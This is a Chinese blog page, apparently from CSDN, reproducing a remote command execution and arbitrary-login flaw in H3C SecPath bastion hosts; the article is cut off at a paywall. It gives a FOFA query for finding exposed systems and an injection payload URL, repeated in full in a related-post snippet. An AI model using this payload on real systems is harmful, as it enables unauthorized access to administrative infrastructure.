H3C SecParh堡垒机 data_provider.php 远程命令执行漏洞

最新推荐文章于 2024-08-28 10:11:08 发布
最新推荐文章于 2024-08-28 10:11:08 发布
阅读量1.7k 收藏
点赞数
分类专栏: 漏洞 文章标签: sql 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51387754/article/details/121617933
版权
本文介绍了H3C SecPath堡垒机中data_provider.php存在的远程命令执行漏洞,攻击者可通过任意用户身份构造特定请求执行命令。复现过程提及该漏洞与齐治堡垒机类似,涉及H3C-SecPath-运维审计系统的安全风险。
摘要由CSDN通过智能技术生成

漏洞简介

H3C SecParh堡垒机 data_provider.php 存在远程命令执行漏洞,攻击者通过任意用户登录或者账号密码进入后台就可以构造特殊的请求执行命令

漏洞类似于齐治堡垒机

漏洞复现

app=“H3C-SecPath-运维审计系统”
在这里插入图片描述先通过任意用户登录获取Cookie

/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121
最低0.47元/天 解锁文章
GuiltyFet
关注
专栏目录
H3C多系列路由器存在前台RCE漏洞(含批量验证poc)
weixin_43567873的博客
04-05 1244
H3C多系列路由器存在前台RCE漏洞(含批量验证poc)
ImportError: /home/anaconda3/lib/libstdc++.so.6: version `GLIBCXX_3.4.29‘ not found解决方案
热门推荐
weixin_43178406的博客
06-09 8万+
本文主要介绍了ImportError: /home/anaconda3/lib/libstdc++.so.6: version `GLIBCXX_3.4.29’ not found解决方案,希望能对学习python的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
H3C路由器userLogin.asp信息泄漏漏洞-类型补充
weixin_45100060的博客
08-06 372
华三家用路由器配置泄露
H3C SecParh堡垒机任意用户登录与远程执行代码漏洞
剁椒鱼头没剁椒的博客
02-02 3492
这里确实成功登录上去了,若设定三权的话,可能存在把admin用户设定为类似与这里的审计管理员,那么就需要测试是否能够跳转到操作管理员或者其它的一些管理员账号上去。这里就不再深入测试,只是提供一个思路。我使用火狐浏览器,我访问后就自动将信息进行下载,不过也有浏览器直接跳转界面的也行,都能够看到。
2024年网络安全山东省赛-SMB信息收集解析(中职组)_使用访问工具对服务器服务访问,将服务器中管理员桌面的文本文档里的内容作为 flag
2401_84252281的博客
04-26 1015
任务环境说明:服务器场景:Server1。
关于H3C路由器漏洞的情况说明
weixin_44106034的博客
10-19 3361
ER3108G-CN,ER3108GW-CN,ER2100-CN,ER2100V2,ER2100n,ER2210C-CN,ER3100-CN,ER3260-CN,ER5100-CN,ER5200-CN,ER6300-CN,ER8300-CN,ER3200-CN已停止维护。H3C MC101/MC102/MC500/H100/H100-EI/H200/H200-EI、H3C X3路由器、H3C Magic R1/R100/B1/B0/B3/M2都已经停止维护。
使用llama index时出现[nltk_data] Error loading stopwords: <urlopen error [Errno 111]的解决方案
weixin_43178406的博客
04-16 7万+
本文主要介绍了使用llama index时出现[nltk_data] Error loading stopwords:
flash_all.bat
01-05
批处理文档,
Mnist数据集以及input_data.py的代码
Anthony
10-21 1万+
Mnist作为tensorflow的入门,但是很多人都在Mnist的数据集上就已经卡住了。有的人找不到input_data.pyde代码。所以在此给那些找不到input_data.py的人提供代码。仅供学习。源代码来自于https://tensorflow.googlesource.com/tensorflow/+/master/tensorflow/examples/tutorials/mnis...
Tesseract最新中文语言包chi-sim.traineddata
10-22
3. 配置Tesseract:确保Tesseract已知新添加的语言包,通常不需要额外配置,因为程序会自动检测可用的语言数据。 4. 运行OCR:现在,当你运行Tesseract并指定输入图像和chi_sim语言选项时,它就能识别图像中的简体...
H3C任意命令执行漏洞
战神/calmness的博客
05-23 9688
H3C漏洞 目录 简述 过程 修复建议 参考链接 简述 H3C iMC智能管理中心 云计算(cloud computing):“云计算是一种计算模式,利用互联网技术把大量可扩展和弹性的IT相关能力作为一种服务提供给多个用户(Gartner)”。提供资源的网络被称为“云”。“云”中的资源在使用者看来是可以无限扩展的,并且可以随时获取,按需使用,随时扩展,这使得应用提供者无需为繁琐的细节而烦恼,能够更加专注于自己的业务,有利于创新和降低成本。 过程 body="iMC来宾接入自助管理..
漏洞复现】H3C SecParh堡垒机任意用户登录漏洞
晚风不及你
02-19 963
H3C SecParh堡垒机是一款专业用于安全管理的堡垒机产品,它通过强大的访问控制功能和安全审计功能,实现对网络服务器的远程安全管理和监控。
H3C SecParh堡垒机任意用户登录
LiBai'S BLOG
12-29 6773
漏洞描述: H3C SecParh堡垒机 get_detail_view.php 存在任意用户登录漏洞 与齐治堡垒机出现的漏洞相似 漏洞复现: POC: /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin ...
(附nuclei yaml文件)H3C多款企业路由器actionpolicy_status信息泄露漏洞复现(管理员密码泄露)
nglj9527的博客
05-22 980
漏洞位于/userLogin.asp页面,通过访问路径/userLogin.asp/…/actionpolicy_status/…/设备型号.cfg,可获取设备配置文件,进而获得WEB管理账号及密码。
漏洞复现 || H3C iMC 存在远程命令执行
失心少年
07-07 1037
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!H3C Intelligent Management Center(以下简称 H3C iMC)是一款业务智能管理平台。攻击者可利用漏洞通过构造特殊的请求造成远程命令执行
H3C ER G2系列路由器敏感信息泄露漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
09-20 2159
H3C ER2200G2是H3C推出的新一代高性能企业级路由器,采用全新硬件架构、具备丰富的软件功能、支持全面的安全策略。定位于以太网/光纤/xDSL接入的中小商业市场(SMB),可部署于需要高速Internet接入的政府机构、中小企业、餐饮连锁、酒店、学校、医院、网吧等网络环境。H3C ER G2系列版本存在敏感信息泄露漏洞。攻击者通过actionpolicy_status跳转别的接口,利用该漏洞访问ER2200G2.cfg文件。
H3C-IMC智能管理中心RCE漏洞复现
最新发布
iSee857的博客
08-28 700
Fofa:(title="用户自助服务" && body="/selfservice/javax.faces.resource/") || body="/selfservice/index.xhtml"autoDeploy接口中存在远程代码执行漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。该漏洞利用难度较低,建议受影响的用户尽快修复。厂商已更新补丁,请即时进行处理。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

GuiltyFet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值